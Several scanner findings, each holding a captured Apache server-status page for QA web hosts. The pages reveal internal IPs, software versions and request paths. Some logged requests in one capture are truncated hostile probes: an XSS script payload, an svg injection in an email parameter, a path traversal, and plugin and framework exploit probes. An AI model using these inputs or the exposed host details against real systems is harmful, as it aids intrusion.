0.26321310180535.90.80116.74 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-0119430/42/13720_ 0.122171217946880.00.36232.01 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 30-020170/262/13394_ 0.731771211307570.02.96120.98 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-021620/382/14683_ 1.28229139563640.02.66219.11 10.253.106.203http/1.1 32-0285090/94/13912_ 0.4128013912612270.01.42169.04 10.253.106.226http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 33-01767017713/18096/117163K 17.867056445532685.034.05240.29 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0-0/0/13905. 0.003792015042140.00.00103.81 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-096240/63/14271R 0.3350510119452860.00.91125.57 10.253.106.203http/1.1 36-0-0/0/13561. 0.00409509509700.00.00137.90 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-01030617715/17845/29135K 11.9400136046732688.932.34122.18 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0-0/0/13663. 0.004340013420670.00.00110.42 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 39-0-0/0/12562. 0.003777011823750.00.00147.11 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-02794841/527/11904K 1.4695124802959516.68.68108.05 10.253.106.226http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 41-0150940/22/12624_ 0.031715513764220.00.20115.96 10.253.106.226http/1.1 42-01361410/53/12253W 0.4300164119394.61.64121.02 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 43-0219600/309/13386R 0.925349213371400.03.07131.83 10.253.106.226http/1.1 44-0279490/298/11855R 1.053841110022070.03.84199.43 10.253.106.226http/1.1 45-089920/73/11473_ 0.26112813230390.00.98257.43 10.253.106.203http/1.1 46-0109336/25/12016K 0.15959119421649.40.36175.66 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/dataTablesLoadMore.min.js H 47-0-0/0/12644. 0.003784011821940.00.00143.72 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-0258724/181/10717K 1.0251141
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c3a05870a
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 26-May-2024 07:53:08 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 18 days 17 hours 53 minutes 19 seconds Server load: 0.00 0.00 0.00 Total accesses: 1428289 - Total Traffic: 14.5 GB - Total Duration: 111619916 CPU Usage: u21.99 s116.01 cu2256.22 cs1439.18 - .237% CPU load .882 requests/sec - 9.4 kB/second - 10.6 kB/request - 78.1494 ms/request 43 requests currently being processed, 31 idle workers KK___KRRKRRR___KRR_RK____RK___R..KR.RK..KK_KR.RK_RK.K__WR_K___.K _.KK.___R_K_.KR_....R..._........._.K..R........................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0295834/96/14427K 0.1921011245198.31.09115.84 10.253.106.226http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.2020.1.0. 1-0186292/5/13553K 0.001171211510147.20.03139.73 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-0226510/0/94561_ 0.004104964090.00.00232.45 10.253.106.226http/1.1 3-0226520/0/14082_ 0.0040011766010.00.00168.94 10.253.106.226http/1.1 4-0270610/32/14537_ 0.101041111351150.00.34160.07 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 5-0300865/370/14540K 1.287014704417.45.90181.45 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2024.4.19. 6-0270790/59/14475R 0.154562113694610.00.21409.57 10.253.106.203http/1.1 7-0209630/14/13747R 0.035221216303160.00.12168.52 10.253.106.203http/1.1 8-02267126/26/13920K 0.07221111721790878.20.86196.05 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0296040/86/18532R 0.36350119788380.01.02141.22 10.253.106.226http/1.1 10-0266020/213/13784R 0.57371113719490.04.14400.51 10.253.106.226http/1.1 11-0286220/80/23610R 0.254031111024490.00.54138.32 10.253.106.203http/1.1 12-0189920/63/13271_ 0.211461012449330.00.37247.87 10.253.106.203http/1.1 13-0286230/87/14083_ 0.221092511526440.00.58138.19 10.253.106.226http/1.1 14-0296050/63/14628_ 0.16981210898550.00.42230.80 10.253.106.226http/1.1 15-0296065/36/26480K 0.0827811114390012.80.63236.00 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 16-0296070/43/62475R 0.10457614074790.00.23202.82 10.253.106.203http/1.1 17-0296080/32/13808R 0.064031114211160.00.08141.47 10.253.106.226http/1.1 18-0231680/0/12826_ 0.0021012848500.00.00125.98 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-0304730/41/13037R 0.105221015296990.00.64307.03 10.253.106.203http/1.1 20-0234722/253/12891K 0.757015382603.312.99179.71 10.253.106.226http/1.1qa1.thermofisher.in:80GET /content/india-chemicals/en/layout/scientific.globalconfig. 21-0231690/0/14326_ 0.0020016832290.00.00139.15 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-0231700/0/14683_ 0.0020012867480.00.00223.74 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0231720/0/13638_ 0.0019012706670.00.00204.59 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0305970/34/13810_ 0.231041212359240.00.61152.16 10.253.106.226http/1.1 25-0305980/93/14531R 0.414271312621560.00.99169.22 10.253.106.203http/1.1 26-01414611/24/13954K 0.067212119915322.50.06166.90 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-0231730/0/49319_ 0.0019011210900.00.00158.51 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0231740/0/12727_ 0.001909914500.00.00111.15 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-0231750/0/13322_ 0.0019017503890.00.00229.34 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 30-0290670/453/13069R 1.24423710752090.04.59117.76 10.253.106.226http/1.1 31-0-0/0/14242. 0.0077609165400.00.00216.09 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-0-0/0/13438. 0.001164012026210.00.00164.67 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-01767011707/12090/111157K 11.721055837721609.923.24229.48 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0306490/174/13547R 0.725641314638490.02.0399.85 10.253.106.226http/1.1 35-0-0/0/14011. 0.001163018715600.00.00123.97 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0286340/91/13307R 0.19316119217720.00.24133.55 10.253.106.226http/1.1 37-01030611708/11838/23128K 7.9840135647321611.821.52111.37 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0-0/0/13289. 0.00784012986310.00.0099.33 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 39-0-0/0/12209. 0.001314011568160.00.00144.87 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-0286366/77/11374K 0.281281173545814.30.4699.36 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0218961/73/12303K 0.211491213549752.21.16114.20 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-0219000/44/11827_ 0.091221115768970.00.17115.77 10.253.106.203http/1.1 43-0219602/9/13086K 0.0110113040039.10.05128.81 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/bootst 44-0219610/10/11547R 0.01274139696540.00.03195.09 10.253.106.203http/1.1 45-0-0/0/11107. 0.001138012925450.00.00253.79 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-0262420/37/11560R 0.13443211463430.00.23171.89 10.253.106.203http/1.1 47-0169836/148/12351K 0.481010114672832.11.56140.96 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 48-0262430/31/10418_ 0.071131210066880.00.24168.72 10.253.106.226http/1.1 49-0262440/83/11555R 0.30338118553550.00.91105.14 10.253.106.203http/1.1 50-0219632/8/11405K 0.0170111774610.90.02140.17 10.253.106.226http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2024. <
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cd02c73fb
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Saturday, 25-May-2024 07:15:13 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 17 days 17 hours 15 minutes 23 seconds Server load: 0.00 0.00 0.00 Total accesses: 1372253 - Total Traffic: 13.9 GB - Total Duration: 106370608 CPU Usage: u26.82 s109.96 cu2157.62 cs1382.06 - .24% CPU load .896 requests/sec - 9.5 kB/second - 10.6 kB/request - 77.5153 ms/request 35 requests currently being processed, 34 idle workers K..R._WRRR___KK_KKR_._...RKK..__KKRKKK_KK_____KK_.___._RR_R.._R_ _KR.R.KK___K_____.R.._.............................._........... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0853812/185/13791K 0.414711105226928.01.17110.26 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-0-0/0/12984. 0.00352010999700.00.00129.93 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 2-0-0/0/93932. 0.0035104197760.00.00226.92 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 3-0259740/142/13574R 0.62318811244700.01.12163.62 10.253.106.226http/1.1 4-0-0/0/14026. 0.00360110843450.00.00155.28 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-088270/409/14009_ 1.40134513945560.02.96172.02 10.253.106.226http/1.1 6-02597811/157/14026W 0.4100128930518.75.42404.45 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 7-0168040/160/13289R 0.613173215911480.02.24163.02 10.253.106.226http/1.1 8-0259790/106/13398R 0.504991216616160.00.87188.97 10.253.106.203http/1.1 9-0156350/72/18079R 0.17318109168930.00.40134.80 10.253.106.203http/1.1 10-090850/460/13198_ 1.13111012990320.02.21390.65 10.253.106.226http/1.1 11-0182700/48/23125_ 0.132372310545280.00.43131.91 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap.min.css HTTP/1.1 12-028030/22/12817_ 0.04131112029850.00.07240.47 10.253.106.226http/1.1 13-0180454/201/13585K 0.442101111037668.90.74130.16 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 14-0177728/186/14165K 0.6613311104201321.61.57222.41 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 15-066560/165/25967_ 0.43131111072580.01.33231.22 10.253.106.226http/1.1 16-0280411/33/61986K 0.072471313501412133.42.15189.12 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-0224582/96/13443K 0.30981313732664.40.75138.10 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-0156370/26/12385R 0.063181512446130.00.11119.37 10.253.106.203http/1.1 19-0156380/81/12519_ 0.2313014722340.00.90300.24 10.253.106.226http/1.1 20-0-0/0/12342. 0.00350014776440.00.00162.70 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0110570/73/13647_ 0.20237015992500.00.31130.37 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/ofi.min.js HTTP/1.1 22-0-0/0/14260. 0.0032012437650.00.00219.22 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0-0/0/13248. 0.0031012281560.00.00199.75 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0-0/0/13476. 0.00360011987030.00.00146.77 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-0224680/88/14061R 0.20318812016030.00.41162.63 10.253.106.226http/1.1 26-0250072/164/13550K 0.752251411561416.44.33157.84 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-0195979/222/48889K 0.5010711108207220.00.80152.83 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 28-0-0/0/12207. 0.001209269230.00.00104.80 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-0-0/0/12769. 0.00345017080480.00.00223.68 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 30-0250080/91/12499_ 0.19541110137510.00.59112.37 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-0250090/93/13723_ 0.23104128860560.00.47196.69 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 32-0176682/743/13038K 1.86111211664055.08.52161.22 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-0176702839/3222/102289K 3.38605497515243.17.26213.50 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0170550/1068/13017R 3.81318014050230.08.0694.98 10.253.106.226http/1.1 35-0176741/542/13616K 1.51431315615172.33.58118.69 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-01767516/581/12874K 1.92250128782476383.810.47129.02 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-0103062840/2970/14260K 2.109013505345244.95.5395.38 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0227100/78/12971_ 0.172451112751650.00.2095.15 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-010544/21/11818K 0.05143128408808.80.06138.90 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-0156463/52/10897K 0.24121268591310.30.4993.87 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-028050/2/11778_ 0.0013010129040.00.00107.09 10.253.106.226http/1.1 42-055910/1/11529_ 0.001321215342210.00.00110.78 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 43-055920/4/12555_ 0.001401012410640.00.01123.40 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-055930/6/11267_ 0.01107129303180.00.01191.58 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 45-0227160/160/10593_ 0.381601212370060.00.75184.26 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 46-01395412/73/11072K 0.4116111108743226.21.40166.28 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 47-0259818/124/11893K 0.3310913108769717.90.75133.71 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cb235b760
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Friday, 24-May-2024 09:00:31 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 days 19 hours 42 seconds Server load: 0.00 0.01 0.00 Total accesses: 1264892 - Total Traffic: 11.2 GB - Total Duration: 78933883 CPU Usage: u57.73 s184.67 cu1930.17 cs1166.55 - .23% CPU load .872 requests/sec - 8.1 kB/second - 9.3 kB/request - 62.4037 ms/request 58 requests currently being processed, 40 idle workers R.KK_KKK_KKKRK.K__RR__.K__KKK_KKKK__KWKRR__R_RRKRKR_R__KKRRKKKRK K_KKK_K_KKK_KKK_______K_K___K.________.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-085130/21/12261R 0.04370107217380.00.0598.46 10.253.106.246http/1.1 1-0-0/0/12073. 0.001607479740.00.00121.24 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 2-0875019384/84955/88444K 61.2580407319156302.0164.96215.98 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 3-0851420/26/12334K 0.0695783499841.50.06153.76 10.253.106.246http/1.1qa1-corporate.thermofisher.com:GET /index.php?query=app=Common%26model=Schedule%26method=runSc 4-0178730/0/12937_ 0.002308913290.00.00145.83 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-085192/46/12837K 0.252376880530110.20.37161.12 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/clientlib-all 6-02375616/118/12686K 0.4823386978151347.21.95392.43 10.253.106.246http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 7-0113654/140/12221K 0.51230125132425.41.8297.13 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/multisitecommons/clien 8-0156510/205/12195_ 0.60571413750030.01.08108.11 10.253.106.162http/1.1qa1-corporate.thermofisher.com:GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/i 9-0204571/141/13144K 0.392308831602.20.82124.33 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 10-01206212/41/12000K 0.26012823540105.80.47166.09 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 11-0291002/173/22176K 0.5712808481442.52.63124.17 10.253.106.246http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 12-0156520/135/11838R 0.4192119285240.01.11233.03 10.253.106.162http/1.1 13-0114917/39/12573K 0.09287983241012.81.27123.09 10.253.106.162http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 14-0-0/0/13037. 0.001508761440.00.00213.69 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 15-0156541/133/24558K 0.922309001644.02.39137.83 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 16-0178740/0/60547_ 0.002207200870.00.00173.72 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-085210/70/11992_ 0.1563129669730.00.53127.10 10.253.106.246http/1.1qa1-corporate.thermofisher.com:GET /microstrategy7/Login.asp?Msg=%22%3E%3Cscript%3Ealert(/2gul 18-0120640/17/11369R 0.0237009814830.00.04109.76 10.253.106.246http/1.1 19-076060/54/11462R 0.163981011619770.00.25292.56 10.253.106.162http/1.1 20-0178750/0/11565_ 0.0022013876190.00.00158.15 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-085400/41/12774_ 0.08631110803210.00.12120.55 10.253.106.246http/1.1qa1-corporate.thermofisher.com:GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scrip 22-0-0/0/13103. 0.001409653450.00.00210.71 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0133171/186/11940K 0.502309674862.01.20128.89 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/multisitecommons/clien 24-0261300/121/12418_ 0.4570119916310.00.86134.65 10.253.106.246http/1.1qa1-corporate.thermofisher.com:GET /email/unsubscribed?email=test@gmail.com%27\\%22%3E%3Csvg/on 25-0121940/21/13077_ 0.05701428767000.00.13153.45 10.253.106.246http/1.1qa1-corporate.thermofisher.com:GET /index.php?option=com_redtwitter&view=../../../../../../../ 26-01255611/69/12301K 0.165991773255.20.26142.16 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 27-0110991/33/47650K 0.1223107716672.20.25142.75 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 28-0204679/74/11561K 0.4411084894523.31.1594.94 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /about HTTP/1.1 29-0178770/0/11683_ 0.0021012279520.00.00138.73 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 30-0125576/30/11640K 0.081641165329813.30.3998.68 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-0209431/109/12856K 0.222307680753.10.3897.75 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/ofi.mi 32-0106461/223/11818K 1.092308778373.43.90147.39 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/lazylo 33-01632629384/94985/97863K 73.4420271231174660.8171.02200.76 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0178780/0/11666_ 0.002109667400.00.0085.23 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-0178790/0/12560_ 0.002109957870.00.00108.44 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0102473/25/12220K 0.0472106719758.90.08118.30 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-0102483/50/10577W 0.230010637926.20.4484.19 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 38-01024918/110/11907K 0.45230841794117.91.2287.44 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/bootst 39-0111000/39/11014R 0.0792486572870.00.2298.96 10.253.106.162http/1.1 40-0125590/5/10304R 0.03502106370540.00.0891.15 10.253.106.162http/1.1 41-0178800/0/10726_ 0.002109455850.00.00102.24 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-0178810/0/10863_ 0.0020011672550.00.00103.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0114940/23/11646R 0.05326119846570.00.17113.89 10.253.106.162http/1.1 44-0198990/98/10551_ 0.2832137221870.00.99186.47 10.253.106.162http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/certificate.pem HTTP/1.1 45-0125610/24/10121R 0.074551211637440.00.13178.60 10.253.106.162http/1.1 46-0114950/28/10675R 0.066031310130880.00.08109.08 10.253.106.246http/1.1 47-01149622/58/10885K 0.112301293445752.80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c5c7ba371
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 23-May-2024 03:59:54 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 15 days 14 hours 5 seconds Server load: 0.22 0.12 0.03 Total accesses: 1101800 - Total Traffic: 10.2 GB - Total Duration: 66793983 CPU Usage: u74.92 s194.32 cu1722.55 cs959.75 - .219% CPU load .818 requests/sec - 8.0 kB/second - 9.8 kB/request - 60.6226 ms/request 37 requests currently being processed, 36 idle workers __K__K_KR_R_K__K_R__K_______KK__KK___K_.W._.R.RKK_R__KR.._RRKKR_ K_____.KRKKR.R........K........RK............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-06930/373/10759_ 0.8061946322030.01.2190.83 10.253.106.246http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.css?v= HT 1-0286120/413/10539_ 1.25224106545190.02.80114.12 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-087508941/74512/78001K 53.9220399893137037.1146.15197.17 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 3-012220/568/10742_ 1.2959877148790.01.69142.64 10.253.106.162http/1.1 4-068510/213/10847_ 0.47282127830420.00.82135.96 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 5-0155391/451/11388K 0.956210722233219.81.29152.76 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 6-051880/473/10798_ 1.130118602100.01.61382.93 10.253.106.246http/1.1 7-0192458/66/10317K 0.1524911108317627.00.1788.75 10.253.106.162http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 8-06960/298/10408R 0.824341312581060.02.0198.49 10.253.106.162http/1.1 9-065330/536/11213_ 1.15601277165550.01.71115.62 10.253.106.162http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.css?v= HTTP/ 10-037930/214/10672R 0.50556117229250.00.66158.97 10.253.106.246http/1.1 11-065340/372/20626_ 0.994127418320.01.83107.23 10.253.106.246http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 12-0846537/493/10245K 1.0940762795102.81.54222.61 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /content/dam/allergy/components/favicon.ico HTTP/1.1 13-085530/568/10841_ 1.38252107225340.02.1792.72 10.253.106.162http/1.1 14-0300080/321/11150_ 